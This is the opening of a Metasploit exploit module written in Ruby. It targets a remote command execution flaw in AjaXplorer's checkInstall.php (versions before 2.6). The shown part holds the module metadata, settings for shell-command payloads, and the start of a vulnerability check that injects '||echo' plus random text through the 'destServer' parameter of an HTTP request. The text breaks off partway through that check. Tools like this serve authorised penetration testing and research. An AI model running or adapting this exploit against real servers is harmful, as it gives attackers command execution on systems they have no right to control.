## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'AjaXplorer checkInstall.php Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable. }, 'Author' => [ 'Julien Cayssol', #Credited according to SecurityFocus 'David Maciejak', #Metasploit module 'sinn3r' #Final touch on the Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '63552' ], [ 'BID', '39334' ] ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'ConnectionType' => 'find', 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby python bash telnet' } }, 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'windows'], 'Arch' => ARCH_CMD, 'Targets' => [[ 'AjaXplorer 2.5.5 or older', { }]], 'DisclosureDate' => 'Apr 4 2010', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/']) ], self.class) end def check target_uri.path << '/' if target_uri.path[-1,1] != '/' clue = Rex::Text::rand_text_alpha(rand(5) + 5) res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{target_uri.path}plugins/access.ssh/checkInstall.php", 'vars_get' => { 'destServer' => "||echo #{clue}" } }) # If the server doesn't return the default